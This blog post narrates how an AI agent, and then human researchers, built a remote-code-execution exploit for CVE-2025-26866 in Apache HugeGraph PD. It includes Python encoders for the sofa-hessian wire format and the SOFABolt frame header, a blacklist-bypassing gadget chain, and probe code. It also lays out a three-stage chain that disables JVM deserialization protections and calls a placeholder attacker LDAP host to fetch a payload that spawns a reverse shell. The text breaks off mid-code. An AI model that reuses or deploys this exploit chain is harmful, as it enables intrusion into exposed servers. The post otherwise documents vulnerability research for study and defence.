Fifty-six CVEs. Fifty-six working exploits. Average cost $13, average time 35 minutes. CVEForge had been running so clean for so long that feeding it another target had become a background task - pick a CVE, type the command, check back after lunch.

Number fifty-seven ate lunch.

CVE-2025-26866 - a Hessian deserialization RCE in Apache HugeGraph - cost $49, took four hours, burned through three context windows, and the session still says "status": "in-progress". By every metric we track, this was our first failure.

It also produced the most technically impressive exploit in our entire set. And then we had to finish the job ourselves.

This is the story of an AI agent that reverse-engineered an undocumented binary protocol from decompiled bytecode, mapped a non-standard serialization format byte by byte, and found a JDK-only gadget chain to bypass a class blacklist - and of the humans who took that work and turned it into a root shell.

The Target

CVE-2025-26866 is an insecure Hessian2 deserialization vulnerability in Apache HugeGraph PD - the Placement Driver component that manages cluster coordination via the Raft consensus protocol. The attack surface is a SOFABolt RPC service on TCP port 8610, exposed without authentication. Send a crafted binary message, the server deserializes it with Hessian2Input.readObject(), and if you can find the right gadget chain, you get remote code execution.

On paper, it looks like a standard Java deserialization bug. CVSS 8.8. No authentication required. Clear deserialization sink. Known gadget libraries on the classpath - Commons Collections 3.2.2, Commons BeanUtils 1.9.4, Spring Framework 5.3.20.

Every previous Java deserialization CVE we’d run through CVEForge had been straightforward: identify the sink, find a classpath-compatible gadget chain, serialize, send, shell. Fifteen minutes for the PoC agent. Maybe twenty if the protocol had a custom header.

This one took four hours and three context window resets. Here’s why.

Three Walls

The agent hit three independent obstacles, each of which would have been a reasonable stopping point for most automated tooling. It didn’t stop.

Wall 1: The Wire Format Isn’t Standard

The first payload attempt used textbook Hessian 2.0 encoding - H tag (0x48) for maps, C tag (0x43) for class definitions, Z (0x5A) for end markers. Every deserialization tutorial on the internet, every ysoserial variant, every Hessian2 reference implementation uses these tags.

The server rejected all of them. readObject: unknown code 0x48.

This is the moment most tooling gives up. The format is documented. The implementation should follow the documentation. When it doesn’t, you need a human to stare at hex dumps.

The agent’s response was methodical. It wrote a Java probe that tested all 256 possible byte values against Hessian2Input.readObject():

import com.caucho.hessian.io.Hessian2Input;
import java.io.ByteArrayInputStream;

for (int tag = 0; tag <= 0xFF; tag++) {
    byte[] data = new byte[]{(byte) tag};
    try {
        Hessian2Input in = new Hessian2Input(new ByteArrayInputStream(data));
        in.readObject();
        System.out.printf("0x%02X: accepted%n", tag);
    } catch (Exception e) {
        // "unknown code" vs. EOF/NPE distinguishes rejected tags from supported ones
        System.out.printf("0x%02X: %s%n", tag, e.getMessage());
    }
}

Then it serialized known Java objects using the server’s own sofa-hessian 3.3.6 library and captured the wire format. What came out was a completely different encoding:

Element          | Standard Hessian 2.0    | sofa-hessian 3.3.6
-----------------|-------------------------|--------------------------------------------------------------------
Untyped map      | H ... Z (0x48…0x5A)     | Not supported
Typed map        | M type ... Z            | M t <2B-len> <type> ... z (lowercase)
End marker       | Z (0x5A)                | z (0x7A)
Class def        | C name nfields fields   | O <compact-int(strlen)> <raw-name> <compact-int(nfields)> <fields>
Object instance  | 0x60-0x6E (compact)     | o <compact-int(ref)>

The library is called Hessian2Input. It does not use the Hessian 2.0 wire format. It uses a custom variant closer to Hessian 1.0 with its own extensions. This is the kind of detail that doesn’t show up in advisories, blog posts, or ysoserial README files. You find it by reading the bytes.
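To make the difference concrete, here’s a minimal Python sketch of the typed-map encoding from the table above. The M/t/z tags and lengths follow the table; the S-tag string encoding for entries is an assumption borrowed from Hessian 1.0 for illustration, not something verified against the library.

```python
import struct

def h1_string(s: str) -> bytes:
    # Hessian 1.0-style final string chunk: 'S' + 2-byte big-endian length + UTF-8
    # (an assumption for illustration; the agent mapped the real tags empirically)
    data = s.encode("utf-8")
    return b"S" + struct.pack(">H", len(data)) + data

def sofa_typed_map(type_name: str, entries: dict) -> bytes:
    # Per the table: M t <2-byte big-endian length> <type> ...pairs... z
    tb = type_name.encode("utf-8")
    out = b"M" + b"t" + struct.pack(">H", len(tb)) + tb
    for k, v in entries.items():
        out += h1_string(k) + h1_string(v)
    return out + b"z"  # lowercase 0x7A end marker, not the Hessian 2.0 'Z' (0x5A)

frame = sofa_typed_map("javax.swing.UIDefaults", {"k1": "v1"})
```

The lowercase end marker alone is enough to make a standards-conformant Hessian 2.0 encoder and this decoder mutually unintelligible.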

Wall 2: The Protocol Has a Protocol

The Hessian2 payload doesn’t go over raw TCP. It goes inside a SOFABolt frame - Ant Group’s binary RPC protocol, used internally at Alibaba and in various open-source projects. The frame format is undocumented outside of the Java source code.

The agent’s first frame attempt used a 17-byte header. The server logged Unknown command type: 111. The value 111 is 0x6F - the ASCII code for o, which is the sofa-hessian object instance tag. The server was reading past the header into the payload body, which meant the header was too short.

To figure out the correct format, the agent installed the CFR Java decompiler inside the Docker container and decompiled SOFABolt’s RpcCommandDecoderV2 class. The actual V1 header is 22 bytes - the missing fields were ver2 (1 byte) and timeout (4 bytes):

[proto(1)] [type(1)] [cmdcode(2)] [ver2(1)] [reqId(4)] [codec(1)]
[timeout(4)] [class_len(2)] [header_len(2)] [content_len(4)]
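The layout packs directly with Python’s struct module. In this sketch the field values (proto, type, cmdcode, codec, timeout) are illustrative guesses, not constants read out of the decompiled source:

```python
import struct

def sofabolt_v1_header(req_id: int, class_name: bytes, content: bytes) -> bytes:
    # [proto(1)][type(1)][cmdcode(2)][ver2(1)][reqId(4)][codec(1)]
    # [timeout(4)][class_len(2)][header_len(2)][content_len(4)] -> 22 bytes total
    return struct.pack(
        ">BBHBIBIHHI",
        1,                # proto version (illustrative)
        1,                # type: request (illustrative)
        1,                # cmdcode: RPC request (illustrative)
        1,                # ver2 - one of the two fields the 17-byte attempt was missing
        req_id,
        1,                # codec: hessian (illustrative)
        3000,             # timeout in ms - the other missing field
        len(class_name),
        0,                # header_len: no header map
        len(content),
    )

frame = sofabolt_v1_header(1, b"org.example.Request", b"\x00" * 10)
```

Drop ver2 and timeout from the format string and you get exactly the 17-byte header that produced the Unknown command type error.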

After fixing the frame, the agent sent a heartbeat and got an ACK. First successful protocol-level communication. Then an RPC request with the correct className field - org.apache.hugegraph.pd.raft.RaftRpcProcessor$GetMemberRequest - and got SERVER_EXCEPTION. The frame was being parsed. The class name was being read. Deserialization was being attempted.

Turn 384 of the first context window. Two walls down.

Wall 3: The Blacklist Blocks Everything Good

With the transport and encoding solved, the agent built a Commons Collections gadget chain. The server rejected it - sofa-hessian 3.3.6 includes a NameBlackListFilter that prefix-matches against a list of known dangerous classes:

com.sun.rowset.JdbcRowSetImpl
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
javax.xml.transform.Templates
org.apache.commons.collections.*
org.springframework.*

The classics. Every gadget chain the agent had used in previous CVE runs was blocked. Commons Collections InvokerTransformer - blocked. Spring ABFPA - blocked. TemplatesImpl - blocked.

But the blacklist doesn’t block everything. The agent researched Hessian-specific gadget chains from academic papers and Chinese security research, and found the ProxyLazyValue chain - a technique that uses only javax.naming.ldap.Rdn$RdnEntry, javax.swing.UIDefaults, and javax.swing.UIDefaults$ProxyLazyValue. JDK classes. Not on the blacklist in sofa-hessian 3.3.6. (They were added in 3.5.5 - as the fix for CVE-2024-46983 - but HugeGraph PD 1.5.0 ships the older library.)
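The prefix semantics are easy to model. A sketch of the startsWith() check the text attributes to NameBlackListFilter, using the excerpted entries (the trailing .* wildcards become plain prefixes):

```python
# Prefix entries from the excerpt above; wildcards rewritten as bare prefixes.
BLACKLIST_PREFIXES = [
    "com.sun.rowset.JdbcRowSetImpl",
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
    "javax.xml.transform.Templates",
    "org.apache.commons.collections.",
    "org.springframework.",
]

def in_black_list(class_name: str) -> bool:
    # NameBlackListFilter prefix-matches with String.startsWith(), per the text
    return any(class_name.startswith(p) for p in BLACKLIST_PREFIXES)

in_black_list("org.apache.commons.collections.functors.InvokerTransformer")  # True
in_black_list("javax.swing.UIDefaults$ProxyLazyValue")                       # False
```

Prefix matching is exactly why the javax.swing and javax.naming.ldap classes sail through: no entry covers them.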

The chain:

TreeMap.put(RdnEntry2, "v2")
  └→ RdnEntry2.compareTo(RdnEntry1)
       └→ UIDefaults_A.equals(UIDefaults_B)
            └→ UIDefaults_B.get("x")
                 └→ ProxyLazyValue.createValue()
                      └→ Constructor.newInstance()
                           └→ new FileOutputStream("/tmp/hugegraph_rce_proof")

ProxyLazyValue.createValue() invokes Constructor.newInstance() when methodName is null, using className and args to instantiate an arbitrary class. The agent configured it to create a FileOutputStream - proving arbitrary code execution by creating a file on the target.
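In Python terms, the dispatch described above looks like this - a control-flow mirror only, since the real mechanism is Java reflection:

```python
def create_value(class_name, method_name, args):
    # methodName == null -> constructor invocation (Constructor.newInstance(args))
    # methodName set     -> static method call (Method.invoke(null, args))
    if method_name is None:
        return ("constructor", class_name, args)
    return ("static", class_name, method_name, args)

create_value("java.io.FileOutputStream", None, ("/tmp/hugegraph_rce_proof",))
```

With methodName left null, the primitive becomes "instantiate any class with any arguments" - which is all the agent needed for a file-creation proof.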

The Blunder

Here’s where we need to be honest about something.

We have a bug. The PoC agent’s turn counter - the thing that tracks how many LLM round-trips the agent has made - wasn’t being captured in our audit logs for this run. The workflow log records timestamps and phase transitions, but the actual turn-by-turn reasoning that drove each discovery was truncated. We know the agent spent 388 turns in the first context window, roughly 425 in the second, and some number in the third. We know this from the internal agent state. But the detailed reasoning chain - the part where you’d see it formulate hypotheses, test them, and adjust - is partially lost.

This is the equivalent of watching a chess match but only seeing every fifth move. You can reconstruct the logic from the board state, but the intermediate reasoning - the candidate moves considered and rejected - is gone.

We’ve been asked if we’re fixing the logging. The honest answer is we’re still debating it. On the one hand, losing the reasoning trace on the most interesting run we’ve ever had is genuinely painful. On the other hand, there’s something poetic about an autonomous agent that reverse-engineers an undocumented binary protocol and then refuses to let you see how it did it. We may have accidentally built the first AI security researcher with operational security.

For this post, we’re working from what we have: the workflow timestamps, the session metrics, the deliverables the agent produced, and the portions of reasoning we did capture. If the agent wants credit for its methodology, it can start writing its own audit logs.

We did, eventually, manage to recover fragments from a secondary log buffer. Not the complete 800+ turns - but enough to watch the agent think. We show what we found below.

The Numbers

Phase        | Duration  | Cost   | Notes
-------------|-----------|--------|-----------------------------------------------
Intel        | 5m 23s    | $1.88  | CVE brief, source clone, version identification
Analysis     | 10m 38s   | $1.98  | Fix diff trace, vulnerable path, classpath mapping
Lab Build    | 27m 59s   | $2.40  | Maven build from source, single container
PoC & Verify | 198m 58s  | $42.94 | 3 context windows, ~800+ turns
Report       | -         | -      | Never reached
Total        | 4h 3m     | $49.20 |

Read that PoC line again. $42.94. Three hours and nineteen minutes. That’s 87% of the total cost, concentrated in a single agent trying to write a working exploit against a target that refused to cooperate.

Our average CVE run costs $13 and takes 35 minutes. This one cost nearly four times as much and took seven times as long. And the session metrics still show "status": "in-progress" - the agent confirmed RCE but never completed the report and bypass phases before we pulled the plug.

For context: the most expensive previous run was LibreNMS at ~$20. CVE-2025-26866 blew past that before the second context window was half done.

What It Actually Produced

Here’s the thing. Despite the cost, despite the incomplete status, despite the fact that we classify this as our first “failure” - the agent produced a working exploit.

At turn 564 of the second context window (10:31 AM, three hours and forty-nine minutes into the run), the Java exploit fired and the marker file appeared on the target:

[+] RCE CONFIRMED! The gadget chain works perfectly!
    The marker file was created.

By turn 588, the agent had ported the entire exploit to pure Python - 700+ lines of stdlib-only code that reimplements:

  • The sofa-hessian 3.3.6 custom wire format (every tag, every encoding quirk)
  • The SOFABolt V1 binary RPC framing (22-byte header, className field, content wrapping)
  • The ProxyLazyValue gadget chain (6-object chain with TreeMap trigger)

No Java dependencies. No ysoserial. No marshalsec. A standalone Python script that speaks a custom binary protocol to exploit a Java deserialization vulnerability through a blacklist bypass. Written autonomously by an AI agent that had never seen this protocol before.

[*] Building sofa-hessian payload with ProxyLazyValue gadget chain...
[*] Hessian2 payload: 259 bytes
[*] Wrapping in SOFABolt V1 frame...
[*] Total frame: 343 bytes

[*] Sending exploit to localhost:8610...
[*] Response: 1318 bytes
[*] Status: SERVER_DESERIAL_EXCEPTION (0x0012)

[VERIFY] Checking for marker file in container...
[+] SUCCESS! Marker file exists:
    -rw-r--r-- 1 root root 0 Mar  1 10:43 /tmp/hugegraph_rce_proof

[+] RCE CONFIRMED - CVE-2025-26866 exploitation successful!

The SERVER_DESERIAL_EXCEPTION is expected - the ClassCastException that terminates the chain happens after the RCE trigger. The file is already created by the time the exception propagates.

Why This One Is Different

Every previous CVEForge run operated within known territory. SSTI? The agent knows Jinja2, FreeMarker, Blade, ERB. File upload? It knows polyglots, extension tricks, MIME validation. SQL injection? Time-based, boolean-based, error-based - all well-documented patterns. Even the more exotic ones - JNDI injection, OGNL expression injection, Pickle deserialization - have established exploitation playbooks.

CVE-2025-26866 had none of that. The agent faced three unknowns simultaneously:

  1. An undocumented binary transport protocol that had to be reverse-engineered from decompiled Java bytecode
  2. A non-standard serialization format that contradicts its own documentation, discovered through empirical byte-level probing
  3. A class blacklist that blocks every commonly known gadget chain, requiring research into academic and non-English-language security publications

Each of these alone would be a reasonable challenge for a human security researcher. The agent solved all three and produced a working exploit. It just took longer and cost more than we’re used to.

The gap between “pattern match against known exploit classes” and “reverse-engineer the protocol from first principles” is the gap between automated vulnerability scanning and actual security research. This run crossed that line.

The Debugging Methodology

What made this run remarkable wasn’t just the outcome - it was the approach. The agent demonstrated several techniques we hadn’t seen in previous runs:

Byte-level probing. Testing all 256 possible tag values to map an undocumented serializer’s behavior. Not searching for documentation, not guessing - systematically enumerating the input space.

In-container decompilation. Installing CFR inside the Docker container to decompile SOFABolt and sofa-hessian classes. Reading the actual implementation instead of relying on documentation that turned out to be wrong.

Incremental protocol validation. Heartbeat first (does the transport work?), then RPC frame (does the framing work?), then empty content (does routing work?), then payload (does deserialization work?). Each step validated one layer before adding the next.
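That layering generalizes to any opaque protocol. A minimal sketch, with placeholder probe callables standing in for real network checks:

```python
def first_broken_layer(checks):
    # Run each layer's probe in order and stop at the first failure, so the
    # failing layer is unambiguous - transport, then framing, then routing,
    # then payload. Each probe is a zero-argument callable returning bool.
    for name, probe in checks:
        if not probe():
            return name
    return None  # every layer validated

layers = [
    ("transport", lambda: True),   # heartbeat got an ACK
    ("framing",   lambda: True),   # RPC frame parsed
    ("routing",   lambda: False),  # className not yet accepted
    ("payload",   lambda: True),
]
first_broken_layer(layers)  # "routing"
```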

Cross-language chain porting. Discovering the working chain in Java (where the gadget libraries live), then reimplementing the entire exploit in Python (where the PoC needs to run). The Python version constructs every Hessian2 byte manually - no serialization library, no shortcuts.

Error message forensics. When the server returned Unknown command type: 111, the agent decoded 111 as 0x6F, recognized it as the Hessian2 o tag, and deduced that the frame header was too short - the server was reading into the payload. That’s the kind of reasoning that comes from understanding both the protocol layer and the serialization layer simultaneously.
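That deduction is a one-liner to reproduce:

```python
# "Unknown command type: 111" - the server read the first byte of our payload
# body as a header field, which only happens if the header we sent was too short.
code = 111
assert hex(code) == "0x6f"
assert chr(code) == "o"  # the sofa-hessian object-instance tag
```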

Inside the Agent’s Head

After the initial write-up, we managed to recover fragments of the reasoning trace from a secondary log buffer. Not the complete 800+ turns - but enough to reconstruct the agent’s thought process across the critical moments. What follows is a chronological walk through the first context window - from initial confusion to working exploit - told in the agent’s own words.

“unknown code 0x48” (Turn 72)

The first sign of trouble. The agent sent a standard Hessian 2.0 payload and the server rejected the very first byte:

The error is readObject: unknown code 0x48 H. The 0x48 is ‘H’ which is the untyped map start tag. But Hessian2Input’s readObject() should handle ‘H’ as an untyped map.

Wait, actually the issue might be related to the Hessian version. In standard Hessian2: ‘H’ (0x48) = untyped map (Hessian 2.0), ‘M’ (0x4d) = typed map. But hessian-3.3.6.jar might be using an older protocol version that doesn’t support ‘H’ for untyped maps. Hessian 1.0 only used ‘M’ for maps, while 2.0 introduced ‘H’ for untyped maps. The version number doesn’t necessarily indicate which protocol version is being used.

This is the moment the agent realized it couldn’t trust the documentation. The library is called Hessian2Input. It says “2” right there in the class name. And the H tag - defined in the Hessian 2.0 specification - is unknown.

The Tag Matrix (Turn 127)

Rather than guess which tags might work, the agent wrote a brute-force probe that tested all 256 byte values as tags against Hessian2Input.readObject(). Fifty-five turns of hypothesis, probe, compile, run, and analyze later, it had a definitive answer:

Now I have a clear picture of what tags are supported:

SUPPORTED (no “unknown code” error):
0x4f ‘O’: Supported but expects integer - this is the Hessian 2.0 object instance tag!
0x4d ‘M’: Supported (but needs more data) - Hessian 1.0 map
0x56 ‘V’: Supported (but needs more data) - Hessian 2.0 typed list
0x52 ‘R’: Supported (NullPointerException = reference lookup failed) - Hessian 1.0 ref

NOT SUPPORTED:
0x43 ‘C’: NOT SUPPORTED - class definition
0x48 ‘H’: NOT SUPPORTED - Hessian 2.0 untyped map
0x5a ‘Z’: NOT SUPPORTED - Hessian 2.0 map/list end

The implementation is picking and choosing from both Hessian versions - supporting ‘M’ for maps, ‘O’ for objects, and ‘V’ for typed lists, but notably missing class definitions and various reference/list handling mechanisms.

Now I’m realizing there’s a contradiction: ‘O’ expects an integer reference to a class definition, but ‘C’ for defining classes isn’t supported.

A few turns later, it cracked the full encoding by hex-dumping objects serialized by the library itself:

So the pattern is clear: ‘O’ marks a class definition with the class name length as a compact integer, followed by the UTF-8 bytes, then the field count and field names, while ‘o’ references that class and provides the actual field values. This is definitely a custom SOFAHessian extension, not standard Hessian 2.0.
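The pattern the agent describes translates into a short Python sketch. The ‘O’ tag and compact-int lengths follow the quote above; the field-name string encoding is an assumption for illustration:

```python
def compact_int(n: int) -> bytes:
    # Hessian single-octet compact int for -16..47: encoded as n + 0x90
    assert -16 <= n <= 47
    return bytes([n + 0x90])

def sofa_class_def(class_name: str, field_names: list) -> bytes:
    # 'O' <compact-int(strlen)> <raw name> <compact-int(nfields)> <fields>
    name = class_name.encode("utf-8")
    out = b"O" + compact_int(len(name)) + name + compact_int(len(field_names))
    for f in field_names:
        fb = f.encode("utf-8")
        out += compact_int(len(fb)) + fb  # assumed compact-string field names
    return out

payload = sofa_class_def("javax.naming.ldap.Rdn$RdnEntry", ["type", "value"])
# payload[0] == 0x4F ('O'), payload[1] == 0xAE (compact int for the 30-char name)
```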

Wall one down.

The Silent Death (Turns 148–151)

With the wire format mapped, the agent built a Commons Collections gadget chain - LazyMap + InvokerTransformer + TiedMapEntry, the classic. The payload serialized. The server deserialized it without error. And nothing happened. No file created. No exception. Silence.

The file wasn’t created. The deserialization succeeded (no exception), but the command didn’t execute. Let me think about why…

I think I see the problem now - MapDeserializer is treating LazyMap as a regular Map and reconstructing it incorrectly, so TiedMapEntry.map ends up being a plain HashMap with the factory stored as a regular entry rather than as LazyMap’s actual factory field.

Two turns later, the agent wrote a diagnostic that serialized a LazyMap and inspected what came back:

Deserialized as: java.util.HashMap (NOT LazyMap!)
Map keys: [factory, map] - treated as map entries, not object fields

The problem is clear: MapDeserializer.readObject() creates a plain HashMap and treats the field names as map keys, not object fields. The LazyMap class is completely lost.

I need to abandon the LazyMap approach entirely and find a different gadget chain.

This is the most painful moment in the log. The agent had spent a hundred turns cracking the wire format, carefully constructed a gadget chain, and it worked - except the one class the entire chain depends on was silently replaced by a HashMap during deserialization. No error, no warning. Just a functional chain that does nothing. Every Map-implementing gadget class has this problem: sofa-hessian’s MapDeserializer strips the implementation and creates a bare HashMap.

What followed was an exhaustive search - PriorityQueue + BeanComparator, EventHandler proxies, Spring ABFPA, ScriptEngineManager, BCEL classloaders, SignedObject - each explored and rejected for specific technical reasons.

The Blacklist and the Breakthrough (Turns 390–429)

After two hundred turns of dead ends, the agent decompiled the HessianSerializer and found the blacklist it hadn’t known about:

There IS a blacklist on the target! The HessianSerializer in com.alipay.remoting (SOFABolt) uses its own SerializerFactory that has a NameBlackListFilter. The inBlackList() method uses String.startsWith(), which means the blacklist entries are prefixes, not exact matches!

Then came the longest single thinking block in the entire 596-turn log - 57,766 characters. In it, the agent systematically evaluated over forty potential bypass classes, checking each against the prefix-based blacklist and the MapDeserializer constraint. TemplatesImpl - blocked. SignedObject - blocked. InitialContext - blocked. ScriptEngineManager - blocked. On and on.

Until:

Since this is CVE-2025-26866, there’s likely a documented exploit vector… CVE-2024-46983 is a known bypass for the sofa-hessian blacklist that uses only JDK classes with no third-party dependencies. This was fixed in sofa-hessian 3.5.5. Our target uses sofa-hessian 3.3.6, which is BEFORE the fix!

The agent traced the chain through the source code, then verified each class against the blacklist:

SwingLazyValue → NOT blacklisted! (no entry starting with sun.swing)
RdnEntry → NOT blacklisted (only javax.naming.InitialContext blocked)
UIDefaults → NOT blacklisted

When SwingLazyValue turned out to be unavailable on JDK 11 (ClassNotFoundException), the agent pivoted to ProxyLazyValue - a public inner class of UIDefaults with the same createValue() mechanism - and mapped the final chain:

When TreeMap.put(rdnEntry2) triggers compareTo(rdnEntry1), the UIDefaults.equals() comparison calls get(“key”), which invokes ProxyLazyValue.createValue() to execute the static method specified by className and methodName with the provided args, achieving RCE.

Even if deserialization fails afterward, the file has already been created - we’ll get an error response but the RCE proof will be there.

The 0xAE Problem (Turn 566)

The RCE fired. Now the agent needed to port the Java exploit to pure Python - which meant understanding every byte of the sofa-hessian encoding without a serialization library. At turn 566, it was analyzing a hex dump of the working payload and hit an unfamiliar byte:

The hex shows 0xAE after the ‘O’, which doesn’t match what I’d expect for “javax.naming.ldap.Rdn$RdnEntry” (30 characters would be 0x1E), so something about my understanding of the encoding is wrong.

Let me work backwards from what I know: the deserialization succeeds, so I should trace through how readObject() handles the ‘O’ tag… Now I’m tracing through what happens when the code is 0xAE (174). This value doesn’t match the special cases for codes 0-3 or the compact string range… 0xAE is actually in the range [0x80, 0xBF], which should be interpreted as a compact int, not a string tag.
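The arithmetic the agent landed on checks out:

```python
def decode_compact_int(tag: int) -> int:
    # Single-octet Hessian compact int: 0x80-0xBF encodes -16..47 as tag - 0x90
    assert 0x80 <= tag <= 0xBF
    return tag - 0x90

decode_compact_int(0xAE)                # 30
len("javax.naming.ldap.Rdn$RdnEntry")   # 30 - exactly the class-name length
```

The mystery byte wasn’t a string tag at all; it was the class-name length in compact-int form.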

Two turns later, it stopped guessing and wrote a systematic probe - a Java program that called every encoding function in sofa-hessian with the exact classes from the gadget chain:

// Turn 568: AnalyzeFormat.java - systematic wire format analysis
import com.caucho.hessian.io.Hessian2Output;
import java.io.ByteArrayOutputStream;
// hexdump(label, bytes): small helper that prints a labeled hex dump (omitted)

// How does writeObjectBegin encode a 30-char class name?
ByteArrayOutputStream bos = new ByteArrayOutputStream();
Hessian2Output out = new Hessian2Output(bos);
out.writeObjectBegin("javax.naming.ldap.Rdn$RdnEntry");
out.close();
hexdump("OB-RdnEntry(30)", bos.toByteArray());

// How about a 37-char class name?
bos = new ByteArrayOutputStream();
out = new Hessian2Output(bos);
out.writeObjectBegin("javax.swing.UIDefaults$ProxyLazyValue");
out.close();
hexdump("OB-PLV(37)", bos.toByteArray());

// What happens with type references on second use?
bos = new ByteArrayOutputStream();
out = new Hessian2Output(bos);
out.writeMapBegin("javax.swing.UIDefaults");
out.writeString("k1"); out.writeString("v1");
out.writeMapEnd();
out.writeMapBegin("javax.swing.UIDefaults");
out.writeString("k2"); out.writeString("v2");
out.writeMapEnd();
out.close();
hexdump("TwoMaps", bos.toByteArray());

Every class in the gadget chain, serialized individually, hex-dumped, compared. Not “try random things and see what works” - methodical elimination of encoding ambiguity by testing each operation in isolation.

The Moment It Clicked (Turn 563)

When the RCE fired, the agent’s reasoning trace showed it understood exactly why the chain worked - not just that it did:

EXCELLENT! The RCE is CONFIRMED! The gadget chain works:

1. The payload was built using sofa-hessian’s Hessian2Output (259 bytes)
2. When deserialized, the chain triggered correctly:
   - TreeMap.put() triggered RdnEntry.compareTo()
   - RdnEntry.compareTo() triggered UIDefaults.equals()
   - UIDefaults.get() found ProxyLazyValue and called createValue()
   - ProxyLazyValue.createValue() called new FileOutputStream("/tmp/hugegraph_rce_proof")
3. The ClassCastException that follows is expected since UIDefaults can’t be cast to String, but the damage is already done

This isn’t an agent that stumbled into a working exploit. It understood the complete execution flow - from the TreeMap comparator entry point through each gadget link to the final constructor invocation. It knew exactly which exception was expected, and why the side effect survived the exception propagation.

The next thing it did was start planning the Python port. Twenty-four turns later, it had 700 lines of standalone Python that reproduced every byte of this chain from scratch.

What We Learned

The ceiling exists, and it’s binary protocols. Everything before this run was application-layer - HTTP endpoints, REST APIs, web sockets. The agent navigated those fluently because the protocol is well-known and the framing is text-based. Binary protocols with custom framing and non-standard encoding are categorically harder. Not impossible - this run proved that - but the cost/time profile changes dramatically.

Context windows are the real bottleneck. The agent solved the problem across three context windows. Each window started fresh (with deliverables from the previous attempt as context), which meant re-establishing state and re-deriving conclusions. If we could give the agent an unlimited context window, this run would have been significantly cheaper and faster. The $42.94 PoC cost includes a lot of redundant work across window boundaries.

Cost scales with novelty, not difficulty. The “hardest” CVE in our set (by CVSS) was not the most expensive. The most expensive was the one where the agent couldn’t fall back on known patterns. A CVSS 10.0 SSTI costs $7. A CVSS 8.8 deserialization behind an undocumented protocol costs $49. The agent’s efficiency correlates with how much of the problem maps to established exploitation playbooks.

“Failed” is relative. Our internal classification says this run failed - the session never completed, the report phase never ran, the bypass agent never activated. But the workspace contains a working RCE exploit, a complete lab, a vulnerability analysis, and a PoC verification report. If you’re a defender trying to understand whether CVE-2025-26866 is exploitable, this “failure” gives you everything you need.

The Fifty-Seven Streak

For the record: CVE-2025-26866 was our fifty-seventh CVE. The first fifty-six all produced complete outputs - working PoCs, Docker labs, verification reports, and when triggered, bypass analyses. The first fifty-six averaged $13 and 35 minutes each.

Number fifty-seven cost $49 and took four hours. And produced the most technically interesting exploit in the entire set.

We’d take that trade every time.

From File Creation to Root Shell

But here’s the thing about creating an empty file on disk: it’s proof of concept, not proof of compromise. The agent proved it could execute arbitrary constructors through the ProxyLazyValue chain - new FileOutputStream("/tmp/marker") - and that’s genuinely impressive. It’s also not the kind of thing that gets you a reverse shell.

We wanted a Metasploit module.

For our growing library of MSF modules, the bar is always the same: check identifies the target, exploit delivers a session. Unix Command target for quick cmd/unix/reverse_bash shells, Linux Dropper target for Meterpreter. Two targets minimum. AutoCheck. CmdStager. The works.

The agent had done the hard part - reverse-engineering the protocol, the wire format, and the blacklist bypass. We just needed to turn “create a file” into “execute arbitrary commands.” How hard could that be?

The Static Method Problem

ProxyLazyValue is a beautifully constrained primitive. When methodName is null, it calls a constructor - that’s how the agent got new FileOutputStream(path). When methodName is set, it calls a static method via reflection:

Class.forName(className).getMethod(methodName, types).invoke(null, args)

Static methods only. No instance methods. And here’s the problem: Runtime.exec() is an instance method. So is ProcessBuilder.start(). Every obvious path to command execution requires an object reference that ProxyLazyValue can’t provide.

But System.setProperty() is static. And InitialContext.doLookup() is static.

The first one lets you manipulate the JVM’s runtime configuration. The second one triggers a JNDI lookup to a URL you control. If that URL points at an LDAP server you own, and that LDAP server responds with a serialized Java object in the javaSerializedData attribute, the target’s JNDI client will dutifully deserialize it. If that serialized object happens to be a Commons Collections or Commons BeanUtils gadget chain with an embedded command - well, now you have arbitrary command execution.

This is the same JNDI deserialization technique that powered Log4Shell. Except instead of ${jndi:ldap://evil.com/x} in a log message, we’re triggering it through a Hessian deserialization chain inside a SOFABolt frame on a Raft consensus port. Same destination, very different road.

Two More Walls

If you’ve been doing Java security since the Log4Shell era, you already know what’s coming. The JDK and library maintainers didn’t sit idle after December 2021.

Wall 4: JDK 11.0.19+ blocks JNDI LDAP deserialization. The property com.sun.jndi.ldap.object.trustSerialData defaults to false on any JDK released after mid-2023. Our target runs OpenJDK 11.0.30. When the JNDI client receives a javaSerializedData attribute from our LDAP server, it checks this property, sees false, and throws a NamingException. Payload never gets deserialized.

Wall 5: Commons Collections 3.2.2 blocks InvokerTransformer. The readObject() method on InvokerTransformer calls FunctorUtils.checkUnsafeSerialization(), which reads org.apache.commons.collections.enableUnsafeSerialization at runtime. If it’s not "true", deserialization throws an UnsupportedOperationException. Every CC chain that uses InvokerTransformer - which is most of them - is dead on arrival.

Two walls. And we’d already burned through three of the agent’s context windows getting past the first three.

But we had something the agent didn’t: we already understood ProxyLazyValue. And System.setProperty() is a static method.

The Three-Stage Chain

The solution was almost elegant. Instead of one SOFABolt frame, send three:

Stage 1: ProxyLazyValue → System.setProperty("com.sun.jndi.ldap.object.trustSerialData", "true")

This has to fire before the JDK’s com.sun.jndi.ldap.Obj class is loaded. That class reads the property into a static final field during class initialization - once it’s cached, you can’t change it. But if no JNDI LDAP operation has occurred yet in the JVM’s lifetime (and in a Raft consensus service, why would one have?), the class hasn’t been loaded. Our setProperty call wins the race by default.

Stage 2: ProxyLazyValue → System.setProperty("org.apache.commons.collections.enableUnsafeSerialization", "true")

Unlike the JDK property, this one is checked dynamically on every deserialization call. No race condition to worry about. Set it once, it stays set.

Stage 3: ProxyLazyValue → InitialContext.doLookup("ldap://ATTACKER:1389/dc=random")

Now the JNDI lookup fires. The JVM’s LDAP client connects to our Metasploit LDAP server (courtesy of the JndiInjection mixin - thank you, MSF framework authors). We serve back a javaSerializedData attribute containing a serialized gadget chain. The target deserializes it. Command executes. Shell connects back.

Three frames. Three side effects. Each one a SERVER_DESERIAL_EXCEPTION on the wire - because the ClassCastException from the TreeMap/RdnEntry chain fires after the ProxyLazyValue side effect has already executed. The server thinks it’s rejecting garbage. It is. The damage is already done.
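Stitched together, the delivery loop is tiny. In this sketch, build_frame is a hypothetical stand-in for the full sofa-hessian/SOFABolt payload builder, and the LDAP URL is a placeholder:

```python
import socket

# The three ProxyLazyValue side effects described above, in firing order.
STAGES = [
    ("java.lang.System", "setProperty",
     ("com.sun.jndi.ldap.object.trustSerialData", "true")),
    ("java.lang.System", "setProperty",
     ("org.apache.commons.collections.enableUnsafeSerialization", "true")),
    ("javax.naming.InitialContext", "doLookup",
     ("ldap://ATTACKER:1389/dc=x",)),  # placeholder attacker LDAP URL
]

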